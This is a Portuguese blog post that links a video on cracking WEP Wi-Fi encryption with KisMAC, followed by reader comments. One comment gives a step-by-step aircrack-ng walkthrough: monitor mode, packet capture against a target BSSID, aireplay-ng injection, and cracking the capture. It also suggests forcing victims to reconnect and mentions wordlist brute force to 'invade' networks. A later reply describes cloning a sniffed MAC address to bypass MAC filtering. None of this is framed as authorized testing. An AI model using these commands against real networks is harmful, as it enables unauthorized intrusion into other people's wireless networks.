quebrando WEP em menos de 10min




Compare preçoswifi, rede sem fio, segurança.

Se você tem um MAC e o kisMAC dando sopa, assista este vídeo e veja como as redes wifi são simples de quebrar. Em menos de 10 min o caboclo quebrou a proteção de uma rede wifi.

Sobre o Autor 




Artigo Anterior
Próximo Artigo

Leia Também


Deixe um comentário

12 Comentários

  1. Para que se 90% das pessoas nao usão nenhum tipo de codificação ;), so do meu quarto tem 2 desprotegidas…
    Uma pena que kisMET não funciona os os drivers da minha placa de wifi, a muito tempo eu quero fazer isso. :cry:
    “veja como as redes wifi são simples de quebrar”
    e voce quer dizer WEP não wifi, eu uso WPA2 com uma chave aleatória de 512 bits, quero ver quem quebra em 10 minutos. 8)
    Responder
    • luis

       /  21/01/2010
      Pode demorar um pouco mais, mas que dá pra quebrar fácil, isso dá, pra isso que existem os aircrack-ng da vida
      Responder
  2. é digo WEP mesmo… no titulo até coloquei WEP, mas no artigo acabo generalizando.
    Responder
  3. blaizer

     /  14/03/2006
    po se tivesse uma parada dessas para windows seria r0x
    Responder
  4. Torre

     /  23/02/2007
    Não consegui ver o arquivo
    Responder
  5. tSha

     /  14/05/2011
    512 bits em 802.11i ? O cara deve ser da nasa…
    Responder
  6. MaSeptimio

     /  09/06/2011
    Ah para né! Se é pra mentir vamos mentir menos então rsrsrsrs. Primeiro o Caio me fala em chave de 512bits (só se foi ele que implementou e não divulgou pra ninguém), depois o luis termina de rachar a cara dizendo que “Pode demorar um pouco mais, mas que dá pra quebrar fácil, isso dá, pra isso que existem os aircrack-ng da vida”
    Tudo isso na verdade depende do que o luis entende por fácil, pois se uma chave 128bits razoavelmente elaborada calculando por baixo o kit do aircrack-ng demoraria cerca deeeee hummmmm talvez uns 15 anos, talvez um pouco mais, então uma chave de 512bits (se existisse para esse tipo de equipamento e tecnologia) demoraria fazendo uma média cerca de 15x15x15x15 = um número muito grande de décadas…rsrsrsrs ou seja, impossível não é, mas teríamos que iniciar o processo hoje para que a 8ª geração dos nossos filhos colhessem os resultados, mas tudo bem.

    Agora vamos falar sério, a grande maioria das redes em fio são de baixíssima segurança ou nenhuma, então isso faz com que a vulnerabilidade se torne eminente.

    O processo é relativamente simples tanto para wep encripted quanto para open, basta baixar o BackTrack R4 rodar o live dvd dele, ter de preferência rede cabeada e placa wireless no pc que ele irá rodar, isso facilita e muito.

    Depois você vai usar as ferramentas que ele já traz, são mais de 300 ferramentas para todo tipo de pen test e análise de vulnerabilidade.

    No caso usaremos os seguintes comandos no terminal (shell)

    1 – airmon-ng start wlan0 (isso se sua wireless for a wlan0, normalmente é)

    2 – kismet (para varrer as redes wireless no alcance de sua placa e anotar seu ssid e bssid)

    3 – quem não quiser usar o kismet pode usar o airodump-ng wlan0

    4 – agora vamos ao que interessa

    #airodump-ng -w wep -c [canal da rede de interesse] –bssid [digite aqui o BSSID que vc leu com o kismet] [informe aqui a interface da sua placa wireless que normalmente é wlan0]

    * Agora vai iniciar o procedimento de captura de pacotes, para acelerar o processo é interessante vc desconectar o roteador e forçar que as pessoas se conectem nele novamente, isso fará com que vc consiga mais pacotes, para uma rede open vc precisa de pelo menos 30.000 pacotes, para uma web com encriptação 128bits pelo menos uns 120.000 pacotes.

    5 – aireplay-ng -1 0 -a [BSSID] [INTERFACE]

    6 – aireplay-ng -3 -b [BSSID] [INTERFACE]

    *depois de atingir a quantidade de pacotes desejada é hora de realmente iniciar o procedimento de crack.

    7 – aircrack-ng wep-01.cap [INTERFACE]

    Você também pode usar o método de wordlist para tentar fazer um brute force de palavras pré-estabelecidas e quem sabe conseguir invadir, em outra oportunidade eu ensino a usar um brute force com wordlist.

    Créditos: Márcio Septímio

    Responder
  7. Kra pra que senha em redes WI-FI meu deixa ela lá livre sem segurança cria uma regra interna no router e autoriza apenas os computadores com MAC num é nem IP para ter acesso a rede, Pra min só quem não da conta de montar uma rede bem estruturada coloca senha em redes WIFI. Obg a atenção tente aproveita algo do que disse!
    Responder
    • Márcio Septímio

       /  21/10/2012
      Bem, se você acha mesmo que criar regra de MAC resolve o problema, então deixe seu roteador aberto pra mim e crie sua regra de MAC, então em cerca de 3 minutos eu faço uma varredura, descubro o número do MAC que está comunicando com o roteador, e faço um clone na minha wireless do seu MAC e adivinha só o que acontece? Pronto, capturei seu endereço MAC e posso navegar pela sua regra como se minha placa wireless fosse a sua.
      Responder
  8. ALLAN

     /  16/10/2012
    Olá..Entendi tudo olhando o vídeo..Tenho um Mac Air e o KisMAC fica travando toda hora. E fiquei na dúvida se é necessário aquelas “anteninhas usb”…Agradeceria se pudesse esclarecer isso pra mim..Desde já obrigado!
    Responder
    • Márcio Septímio

       /  21/10/2012
      Não se faz necessário as antenas, apesar delas serem muito úteis, mas só em relação ao sinal, seu problema de travamento deve estar relacionado à forma como o está fazendo ou sua wireless mesmo.
      Responder
  1. Tudo Link - Fotos, Vídeos, Imagens, Textos e Comentários » Blog Archive » Wireless quebrar senha WEP

Deixe uma resposta

O seu endereço de email não será publicado Campos obrigatórios são marcados *

Você pode usar estas tags e atributos de HTML: <a href="" title="" rel=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Switch to our mobile site